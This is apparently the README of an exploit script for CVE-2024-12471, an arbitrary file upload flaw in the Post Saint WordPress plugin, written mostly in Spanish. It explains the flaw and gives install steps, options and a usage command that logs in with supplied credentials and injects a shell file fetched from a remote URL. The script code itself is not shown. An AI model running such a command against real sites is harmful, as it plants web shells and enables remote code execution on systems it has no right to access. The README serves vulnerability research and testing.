
Plugin Post Saint <= 1.3.1 para WordPress - Carga Arbitraria de Archivos
Plugin Post Saint <= 1.3.1 para WordPress – Subida Arbitraria de Archivos
El plugin Post Saint para WordPress (versiones hasta la 1.3.1 inclusive) es vulnerable a subidas arbitrarias de archivos debido a la falta de comprobaciones de capacidad y validación de tipos de archivo. Atacantes autenticados con al menos acceso de nivel suscriptor pueden explotar esta vulnerabilidad para subir archivos arbitrarios, lo que potencialmente conduce a la ejecución remota de código.
pip install requests packaging urllib3
CVE-2024-12471 | Post Saint plugin for wordpress Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-ru REMOTE_URL, --remote_url REMOTE_URL
Remote URL of the shell file to inject
python CVE-2024-12471.py -u <Base URL> -un <Username> -p <Password> -ru <Remote Shell URL>
Este script es solo para fines educativos y de investigación. El uso no autorizado contra sistemas que no posee o para los que no tiene permiso explícito para probar es ilegal y poco ético.